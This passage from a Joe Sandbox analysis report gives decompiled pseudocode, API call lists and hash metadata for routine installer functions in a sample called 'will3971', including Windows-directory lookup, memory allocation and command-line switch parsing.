                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t5;
                                                				void* _t9;
                                                				void* _t13;
                                                				void* _t19;
                                                				void* _t20;
                                                				signed int _t21;
                                                
                                                				_t5 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t5 ^ _t21;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					0x4f0 = 2;
                                                					_t9 = E002F597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                				} else {
                                                					E002F44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                					 *0x2f9124 = E002F6285();
                                                					_t9 = 0;
                                                				}
                                                				return E002F6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                			}











                                                0x002f6229
                                                0x002f6230
                                                0x002f6247
                                                0x002f626a
                                                0x002f6272
                                                0x002f6249
                                                0x002f6255
                                                0x002f625f
                                                0x002f6264
                                                0x002f6264
                                                0x002f6284

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 002F623F
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                  • Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                • String ID:
                                                • API String ID: 381621628-0
                                                • Opcode ID: 79b916ec6ebc45ec8e1e716b7799ea2e64cbd7962fe3757d4458babb68490588
                                                • Instruction ID: 00cfb7c19fd4c3e3a92fdda03063fbe20f98fbef837f100c36cbc2ca119587eb
                                                • Opcode Fuzzy Hash: 79b916ec6ebc45ec8e1e716b7799ea2e64cbd7962fe3757d4458babb68490588
                                                • Instruction Fuzzy Hash: 86F0B4B061020C6BD750EB74AD0AFBAB2A8DB54780F40047AAA89D6181DDB49D64CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F4B60(signed int _a4) {
                                                				signed int _t9;
                                                				signed int _t15;
                                                
                                                				_t15 = _a4 * 0x18;
                                                				if( *((intOrPtr*)(_t15 + 0x2f8d64)) != 1) {
                                                					_t9 = FindCloseChangeNotification( *(_t15 + 0x2f8d74)); // executed
                                                					if(_t9 == 0) {
                                                						return _t9 | 0xffffffff;
                                                					}
                                                					 *((intOrPtr*)(_t15 + 0x2f8d60)) = 1;
                                                					return 0;
                                                				}
                                                				 *((intOrPtr*)(_t15 + 0x2f8d60)) = 1;
                                                				 *((intOrPtr*)(_t15 + 0x2f8d68)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0x2f8d70)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0x2f8d6c)) = 0;
                                                				return 0;
                                                			}





                                                0x002f4b66
                                                0x002f4b74
                                                0x002f4b98
                                                0x002f4ba0
                                                0x00000000
                                                0x002f4bac
                                                0x002f4ba4
                                                0x00000000
                                                0x002f4ba4
                                                0x002f4b78
                                                0x002f4b7e
                                                0x002f4b84
                                                0x002f4b8a
                                                0x00000000

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,002F4FA1,00000000), ref: 002F4B98
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: 1ffb512a0370dc96736cb5334dc3c60d70f46075c701985d37c0836792a2dfe0
                                                • Instruction ID: 6e2172765db829b50337a06b1fa90e13476cb614ca462eaf8c9ad076fbd745ad
                                                • Opcode Fuzzy Hash: 1ffb512a0370dc96736cb5334dc3c60d70f46075c701985d37c0836792a2dfe0
                                                • Instruction Fuzzy Hash: D5F0DA71910B0CDE47A19E39D808B73FBE4AE953E1310093AD57ED2191EA70A451CA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F66AE(CHAR* __ecx) {
                                                				unsigned int _t1;
                                                
                                                				_t1 = GetFileAttributesA(__ecx); // executed
                                                				if(_t1 != 0xffffffff) {
                                                					return  !(_t1 >> 4) & 0x00000001;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}




                                                0x002f66b1
                                                0x002f66ba
                                                0x002f66c7
                                                0x002f66bc
                                                0x002f66be
                                                0x002f66be

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,002F4777,?,002F4E38,?), ref: 002F66B1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: f3f82e5f0d500d8dcc376bbc8ebc48cee16479ac46b6f271e1106792e04a7460
                                                • Instruction ID: 69a2160f0ef3a9022f41e612b7d8e50170aad89ca30313c9a01a1d7277231164
                                                • Opcode Fuzzy Hash: f3f82e5f0d500d8dcc376bbc8ebc48cee16479ac46b6f271e1106792e04a7460
                                                • Instruction Fuzzy Hash: E3B092B623244A426A200A317C2D6662945E6C127A7E41BA4F136C11E0CE3EC856D008
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F4CA0(long _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x002f4caa
                                                0x002f4cb1

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 002F4CAA
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 32e2cbea63be8539dea2f9990e055b757337438bfa6c7033ac82efe2844f0d35
                                                • Instruction ID: 9fedae4c5aa4413cae20b1ad0df4c20f6a8a5ee653cc5655cad342b5d0e90af7
                                                • Opcode Fuzzy Hash: 32e2cbea63be8539dea2f9990e055b757337438bfa6c7033ac82efe2844f0d35
                                                • Instruction Fuzzy Hash: 53B09232044208B7CB001A82B809F953F19E7846A1F140010F60C450908A629410869A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F4CC0(void* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalFree(_a4); // executed
                                                				return _t2;
                                                			}




                                                0x002f4cc8
                                                0x002f4ccf

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: b01857c819270aabea0868528c2c476537f28fa1d667773a5840fa20060bf563
                                                • Instruction ID: 9424f48f921df637a4200b24c78d29a732a8cd45ec77868a6272d94745cd606c
                                                • Opcode Fuzzy Hash: b01857c819270aabea0868528c2c476537f28fa1d667773a5840fa20060bf563
                                                • Instruction Fuzzy Hash: FDB0123100010CB78F001B42FC0CC553F1DD6C02B07000020F50C410218F339811C585
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E002F5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				CHAR* _v265;
                                                				char _v266;
                                                				char _v267;
                                                				char _v268;
                                                				CHAR* _v272;
                                                				char _v276;
                                                				signed int _v296;
                                                				char _v556;
                                                				signed int _t61;
                                                				int _t63;
                                                				char _t67;
                                                				CHAR* _t69;
                                                				signed int _t71;
                                                				void* _t75;
                                                				char _t79;
                                                				void* _t83;
                                                				void* _t85;
                                                				void* _t87;
                                                				intOrPtr _t88;
                                                				void* _t100;
                                                				intOrPtr _t101;
                                                				CHAR* _t104;
                                                				intOrPtr _t105;
                                                				void* _t111;
                                                				void* _t115;
                                                				CHAR* _t118;
                                                				void* _t119;
                                                				void* _t127;
                                                				CHAR* _t129;
                                                				void* _t132;
                                                				void* _t142;
                                                				signed int _t143;
                                                				CHAR* _t144;
                                                				void* _t145;
                                                				void* _t146;
                                                				void* _t147;
                                                				void* _t149;
                                                				char _t155;
                                                				void* _t157;
                                                				void* _t162;
                                                				void* _t163;
                                                				char _t167;
                                                				char _t170;
                                                				CHAR* _t173;
                                                				void* _t177;
                                                				intOrPtr* _t183;
                                                				intOrPtr* _t192;
                                                				CHAR* _t199;
                                                				void* _t200;
                                                				CHAR* _t201;
                                                				void* _t205;
                                                				void* _t206;
                                                				int _t209;
                                                				void* _t210;
                                                				void* _t212;
                                                				void* _t213;
                                                				CHAR* _t218;
                                                				intOrPtr* _t219;
                                                				intOrPtr* _t220;
                                                				signed int _t221;
                                                				signed int _t223;
                                                
                                                				_t173 = __ecx;
                                                				_t61 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t61 ^ _t221;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_t209 = 1;
                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                					_t63 = 1;
                                                				} else {
                                                					L2:
                                                					while(_t209 != 0) {
                                                						_t67 =  *_t173;
                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                							_t173 = CharNextA(_t173);
                                                							continue;
                                                						}
                                                						_v272 = _t173;
                                                						if(_t67 == 0) {
                                                							break;
                                                						} else {
                                                							_t69 = _v272;
                                                							_t177 = 0;
                                                							_t213 = 0;
                                                							_t163 = 0;
                                                							_t202 = 1;
                                                							do {
                                                								if(_t213 != 0) {
                                                									if(_t163 != 0) {
                                                										break;
                                                									} else {
                                                										goto L21;
                                                									}
                                                								} else {
                                                									_t69 =  *_t69;
                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                										break;
                                                									} else {
                                                										_t69 = _v272;
                                                										L21:
                                                										_t155 =  *_t69;
                                                										if(_t155 != 0x22) {
                                                											if(_t202 >= 0x104) {
                                                												goto L106;
                                                											} else {
                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                												_t177 = _t177 + 1;
                                                												_t202 = _t202 + 1;
                                                												_t157 = 1;
                                                												goto L30;
                                                											}
                                                										} else {
                                                											if(_v272[1] == 0x22) {
                                                												if(_t202 >= 0x104) {
                                                													L106:
                                                													_t63 = 0;
                                                													L125:
                                                													_pop(_t210);
                                                													_pop(_t212);
                                                													_pop(_t162);
                                                													return E002F6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                												} else {
                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                													_t177 = _t177 + 1;
                                                													_t202 = _t202 + 1;
                                                													_t157 = 2;
                                                													goto L30;
                                                												}
                                                											} else {
                                                												_t157 = 1;
                                                												if(_t213 != 0) {
                                                													_t163 = 1;
                                                												} else {
                                                													_t213 = 1;
                                                												}
                                                												goto L30;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L131;
                                                								L30:
                                                								_v272 =  &(_v272[_t157]);
                                                								_t69 = _v272;
                                                							} while ( *_t69 != 0);
                                                							if(_t177 >= 0x104) {
                                                								E002F6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                								asm("int3");
                                                								_push(_t221);
                                                								_t222 = _t223;
                                                								_t71 =  *0x2f8004; // 0x404cc811
                                                								_v296 = _t71 ^ _t223;
                                                								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                									0x4f0 = 2;
                                                									_t75 = E002F597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                								} else {
                                                									E002F44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                									 *0x2f9124 = E002F6285();
                                                									_t75 = 0;
                                                								}
                                                								return E002F6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                							} else {
                                                								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                								if(_t213 == 0) {
                                                									if(_t163 != 0) {
                                                										goto L34;
                                                									} else {
                                                										goto L40;
                                                									}
                                                								} else {
                                                									if(_t163 != 0) {
                                                										L40:
                                                										_t79 = _v268;
                                                										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                											_t83 = CharUpperA(_v267) - 0x3f;
                                                											if(_t83 == 0) {
                                                												_t202 = 0x521;
                                                												E002F44B9(0, 0x521, 0x2f1140, 0, 0x40, 0);
                                                												_t85 =  *0x2f8588; // 0x0
                                                												if(_t85 != 0) {
                                                													CloseHandle(_t85);
                                                												}
                                                												ExitProcess(0);
                                                											}
                                                											_t87 = _t83 - 4;
                                                											if(_t87 == 0) {
                                                												if(_v266 != 0) {
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                														_t215 =  &_v268 + _t167;
                                                														_t183 =  &_v268 + _t167;
                                                														_t50 = _t183 + 1; // 0x1
                                                														_t202 = _t50;
                                                														do {
                                                															_t88 =  *_t183;
                                                															_t183 = _t183 + 1;
                                                														} while (_t88 != 0);
                                                														if(_t183 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t205 = 0x5b;
                                                															if(E002F667F(_t215, _t205) == 0) {
                                                																L115:
                                                																_t206 = 0x5d;
                                                																if(E002F667F(_t215, _t206) == 0) {
                                                																	L117:
                                                																	_t202 =  &_v276;
                                                																	_v276 = _t167;
                                                																	if(E002F5C17(_t215,  &_v276) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		_t202 = 0x104;
                                                																		E002F1680(0x2f8c42, 0x104, _v276 + _t167 +  &_v268);
                                                																	}
                                                																} else {
                                                																	_t202 = 0x5b;
                                                																	if(E002F667F(_t215, _t202) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		goto L117;
                                                																	}
                                                																}
                                                															} else {
                                                																_t202 = 0x5d;
                                                																if(E002F667F(_t215, _t202) == 0) {
                                                																	goto L49;
                                                																} else {
                                                																	goto L115;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													 *0x2f8a24 = 1;
                                                												}
                                                												goto L50;
                                                											} else {
                                                												_t100 = _t87 - 1;
                                                												if(_t100 == 0) {
                                                													L98:
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                														_t217 =  &_v268 + _t170;
                                                														_t192 =  &_v268 + _t170;
                                                														_t38 = _t192 + 1; // 0x1
                                                														_t202 = _t38;
                                                														do {
                                                															_t101 =  *_t192;
                                                															_t192 = _t192 + 1;
                                                														} while (_t101 != 0);
                                                														if(_t192 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t202 =  &_v276;
                                                															_v276 = _t170;
                                                															if(E002F5C17(_t217,  &_v276) == 0) {
                                                																goto L49;
                                                															} else {
                                                																_t104 = CharUpperA(_v267);
                                                																_t218 = 0x2f8b3e;
                                                																_t105 = _v276;
                                                																if(_t104 != 0x54) {
                                                																	_t218 = 0x2f8a3a;
                                                																}
                                                																E002F1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                																_t202 = 0x104;
                                                																E002F658A(_t218, 0x104, 0x2f1140);
                                                																if(E002F31E0(_t218) != 0) {
                                                																	goto L50;
                                                																} else {
                                                																	goto L106;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													_t111 = _t100 - 0xa;
                                                													if(_t111 == 0) {
                                                														if(_v266 != 0) {
                                                															if(_v266 != 0x3a) {
                                                																goto L49;
                                                															} else {
                                                																_t199 = _v265;
                                                																if(_t199 != 0) {
                                                																	_t219 =  &_v265;
                                                																	do {
                                                																		_t219 = _t219 + 1;
                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                																		if(_t115 == 0) {
                                                																			 *0x2f8a2c = 1;
                                                																		} else {
                                                																			_t200 = 2;
                                                																			_t119 = _t115 - _t200;
                                                																			if(_t119 == 0) {
                                                																				 *0x2f8a30 = 1;
                                                																			} else {
                                                																				if(_t119 == 0xf) {
                                                																					 *0x2f8a34 = 1;
                                                																				} else {
                                                																					_t209 = 0;
                                                																				}
                                                																			}
                                                																		}
                                                																		_t118 =  *_t219;
                                                																		_t199 = _t118;
                                                																	} while (_t118 != 0);
                                                																}
                                                															}
                                                														} else {
                                                															 *0x2f8a2c = 1;
                                                														}
                                                														goto L50;
                                                													} else {
                                                														_t127 = _t111 - 3;
                                                														if(_t127 == 0) {
                                                															if(_v266 != 0) {
                                                																if(_v266 != 0x3a) {
                                                																	goto L49;
                                                																} else {
                                                																	_t129 = CharUpperA(_v265);
                                                																	if(_t129 == 0x31) {
                                                																		goto L76;
                                                																	} else {
                                                																		if(_t129 == 0x41) {
                                                																			goto L83;
                                                																		} else {
                                                																			if(_t129 == 0x55) {
                                                																				goto L76;
                                                																			} else {
                                                																				goto L49;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															} else {
                                                																L76:
                                                																_push(2);
                                                																_pop(1);
                                                																L83:
                                                																 *0x2f8a38 = 1;
                                                															}
                                                															goto L50;
                                                														} else {
                                                															_t132 = _t127 - 1;
                                                															if(_t132 == 0) {
                                                																if(_v266 != 0) {
                                                																	if(_v266 != 0x3a) {
                                                																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                																			goto L49;
                                                																		}
                                                																	} else {
                                                																		_t201 = _v265;
                                                																		 *0x2f9a2c = 1;
                                                																		if(_t201 != 0) {
                                                																			_t220 =  &_v265;
                                                																			do {
                                                																				_t220 = _t220 + 1;
                                                																				_t142 = CharUpperA(_t201) - 0x41;
                                                																				if(_t142 == 0) {
                                                																					_t143 = 2;
                                                																					 *0x2f9a2c =  *0x2f9a2c | _t143;
                                                																					goto L70;
                                                																				} else {
                                                																					_t145 = _t142 - 3;
                                                																					if(_t145 == 0) {
                                                																						 *0x2f8d48 =  *0x2f8d48 | 0x00000040;
                                                																					} else {
                                                																						_t146 = _t145 - 5;
                                                																						if(_t146 == 0) {
                                                																							 *0x2f9a2c =  *0x2f9a2c & 0xfffffffd;
                                                																							goto L70;
                                                																						} else {
                                                																							_t147 = _t146 - 5;
                                                																							if(_t147 == 0) {
                                                																								 *0x2f9a2c =  *0x2f9a2c & 0xfffffffe;
                                                																								goto L70;
                                                																							} else {
                                                																								_t149 = _t147;
                                                																								if(_t149 == 0) {
                                                																									 *0x2f8d48 =  *0x2f8d48 | 0x00000080;
                                                																								} else {
                                                																									if(_t149 == 3) {
                                                																										 *0x2f9a2c =  *0x2f9a2c | 0x00000004;
                                                																										L70:
                                                																										 *0x2f8a28 = 1;
                                                																									} else {
                                                																										_t209 = 0;
                                                																									}
                                                																								}
                                                																							}
                                                																						}
                                                																					}
                                                																				}
                                                																				_t144 =  *_t220;
                                                																				_t201 = _t144;
                                                																			} while (_t144 != 0);
                                                																		}
                                                																	}
                                                																} else {
                                                																	 *0x2f9a2c = 3;
                                                																	 *0x2f8a28 = 1;
                                                																}
                                                																goto L50;
                                                															} else {
                                                																if(_t132 == 0) {
                                                																	goto L98;
                                                																} else {
                                                																	L49:
                                                																	_t209 = 0;
                                                																	L50:
                                                																	_t173 = _v272;
                                                																	if( *_t173 != 0) {
                                                																		goto L2;
                                                																	} else {
                                                																		break;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											goto L106;
                                                										}
                                                									} else {
                                                										L34:
                                                										_t209 = 0;
                                                										break;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L131;
                                                					}
                                                					if( *0x2f8a2c != 0 &&  *0x2f8b3e == 0) {
                                                						if(GetModuleFileNameA( *0x2f9a3c, 0x2f8b3e, 0x104) == 0) {
                                                							_t209 = 0;
                                                						} else {
                                                							_t202 = 0x5c;
                                                							 *((char*)(E002F66C8(0x2f8b3e, _t202) + 1)) = 0;
                                                						}
                                                					}
                                                					_t63 = _t209;
                                                				}
                                                				L131:
                                                			}


































































                                                0x002f5c9e
                                                0x002f5ca9
                                                0x002f5cb0
                                                0x002f5cb3
                                                0x002f5cb6
                                                0x002f5cb7
                                                0x002f5cb8
                                                0x002f5cbd
                                                0x002f6204
                                                0x002f5ccb
                                                0x00000000
                                                0x002f5ccb
                                                0x002f5cd3
                                                0x002f5cd7
                                                0x002f5cf4
                                                0x00000000
                                                0x002f5cf4
                                                0x002f5cf8
                                                0x002f5d00
                                                0x00000000
                                                0x002f5d06
                                                0x002f5d06
                                                0x002f5d0e
                                                0x002f5d10
                                                0x002f5d12
                                                0x002f5d14
                                                0x002f5d15
                                                0x002f5d17
                                                0x002f5d49
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f5d19
                                                0x002f5d19
                                                0x002f5d1d
                                                0x00000000
                                                0x002f5d3f
                                                0x002f5d3f
                                                0x002f5d4b
                                                0x002f5d4b
                                                0x002f5d4f
                                                0x002f5d8d
                                                0x00000000
                                                0x002f5d93
                                                0x002f5d93
                                                0x002f5d9a
                                                0x002f5d9d
                                                0x002f5d9e
                                                0x00000000
                                                0x002f5d9e
                                                0x002f5d51
                                                0x002f5d5b
                                                0x002f5d72
                                                0x002f60fb
                                                0x002f60fb
                                                0x002f6207
                                                0x002f620a
                                                0x002f620b
                                                0x002f620e
                                                0x002f6217
                                                0x002f5d78
                                                0x002f5d78
                                                0x002f5d80
                                                0x002f5d83
                                                0x002f5d84
                                                0x00000000
                                                0x002f5d84
                                                0x002f5d5d
                                                0x002f5d5f
                                                0x002f5d62
                                                0x002f5d68
                                                0x002f5d64
                                                0x002f5d64
                                                0x002f5d64
                                                0x00000000
                                                0x002f5d62
                                                0x002f5d5b
                                                0x002f5d4f
                                                0x002f5d1d
                                                0x00000000
                                                0x002f5d9f
                                                0x002f5d9f
                                                0x002f5da5
                                                0x002f5dab
                                                0x002f5dba
                                                0x002f6218
                                                0x002f621d
                                                0x002f6220
                                                0x002f6221
                                                0x002f6229
                                                0x002f6230
                                                0x002f6247
                                                0x002f626a
                                                0x002f6272
                                                0x002f6249
                                                0x002f6255
                                                0x002f625f
                                                0x002f6264
                                                0x002f6264
                                                0x002f6284
                                                0x002f5dc0
                                                0x002f5dc0
                                                0x002f5dca
                                                0x002f5e22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f5dcc
                                                0x002f5dce
                                                0x002f5e24
                                                0x002f5e24
                                                0x002f5e2c
                                                0x002f5e47
                                                0x002f5e4a
                                                0x002f61d2
                                                0x002f61e2
                                                0x002f61e7
                                                0x002f61ee
                                                0x002f61f1
                                                0x002f61f1
                                                0x002f61f8
                                                0x002f61f8
                                                0x002f5e50
                                                0x002f5e53
                                                0x002f6109
                                                0x002f611f
                                                0x00000000
                                                0x002f6125
                                                0x002f6137
                                                0x002f613a
                                                0x002f613c
                                                0x002f613e
                                                0x002f613e
                                                0x002f6141
                                                0x002f6141
                                                0x002f6143
                                                0x002f6144
                                                0x002f614a
                                                0x00000000
                                                0x002f6150
                                                0x002f6152
                                                0x002f615c
                                                0x002f6170
                                                0x002f6172
                                                0x002f617c
                                                0x002f6190
                                                0x002f6190
                                                0x002f6196
                                                0x002f61a5
                                                0x00000000
                                                0x002f61ab
                                                0x002f61b9
                                                0x002f61c6
                                                0x002f61c6
                                                0x002f617e
                                                0x002f6180
                                                0x002f618a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f618a
                                                0x002f615e
                                                0x002f6160
                                                0x002f616a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f616a
                                                0x002f615c
                                                0x002f614a
                                                0x002f610b
                                                0x002f610e
                                                0x002f610e
                                                0x00000000
                                                0x002f5e59
                                                0x002f5e59
                                                0x002f5e5c
                                                0x002f604f
                                                0x002f6056
                                                0x00000000
                                                0x002f605c
                                                0x002f606e
                                                0x002f6071
                                                0x002f6073
                                                0x002f6075
                                                0x002f6075
                                                0x002f6078
                                                0x002f6078
                                                0x002f607a
                                                0x002f607b
                                                0x002f6081
                                                0x00000000
                                                0x002f6087
                                                0x002f6087
                                                0x002f608d
                                                0x002f609c
                                                0x00000000
                                                0x002f60a2
                                                0x002f60aa
                                                0x002f60b2
                                                0x002f60b7
                                                0x002f60bd
                                                0x002f60bf
                                                0x002f60bf
                                                0x002f60d6
                                                0x002f60e0
                                                0x002f60e7
                                                0x002f60f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f60f5
                                                0x002f609c
                                                0x002f6081
                                                0x002f5e62
                                                0x002f5e62
                                                0x002f5e65
                                                0x002f5fd3
                                                0x002f5fe9
                                                0x00000000
                                                0x002f5fef
                                                0x002f5fef
                                                0x002f5ff7
                                                0x002f5ffd
                                                0x002f6003
                                                0x002f6006
                                                0x002f6011
                                                0x002f6014
                                                0x002f603d
                                                0x002f6016
                                                0x002f6018
                                                0x002f6019
                                                0x002f601b
                                                0x002f6033
                                                0x002f601d
                                                0x002f6020
                                                0x002f6029
                                                0x002f6022
                                                0x002f6022
                                                0x002f6022
                                                0x002f6020
                                                0x002f601b
                                                0x002f6042
                                                0x002f6044
                                                0x002f6046
                                                0x002f604a
                                                0x002f5ff7
                                                0x002f5fd5
                                                0x002f5fd8
                                                0x002f5fd8
                                                0x00000000
                                                0x002f5e6b
                                                0x002f5e6b
                                                0x002f5e6e
                                                0x002f5f8b
                                                0x002f5f99
                                                0x00000000
                                                0x002f5f9f
                                                0x002f5fa7
                                                0x002f5faf
                                                0x00000000
                                                0x002f5fb1
                                                0x002f5fb3
                                                0x00000000
                                                0x002f5fb5
                                                0x002f5fb7
                                                0x00000000
                                                0x002f5fb9
                                                0x00000000
                                                0x002f5fb9
                                                0x002f5fb7
                                                0x002f5fb3
                                                0x002f5faf
                                                0x002f5f8d
                                                0x002f5f8d
                                                0x002f5f8d
                                                0x002f5f8f
                                                0x002f5fc1
                                                0x002f5fc1
                                                0x002f5fc1
                                                0x00000000
                                                0x002f5e74
                                                0x002f5e74
                                                0x002f5e77
                                                0x002f5ea0
                                                0x002f5ebd
                                                0x002f5f79
                                                0x00000000
                                                0x002f5f7f
                                                0x002f5ec3
                                                0x002f5ec3
                                                0x002f5ecc
                                                0x002f5ed4
                                                0x002f5ed6
                                                0x002f5edc
                                                0x002f5edf
                                                0x002f5eea
                                                0x002f5eed
                                                0x002f5f3f
                                                0x002f5f40
                                                0x00000000
                                                0x002f5eef
                                                0x002f5eef
                                                0x002f5ef2
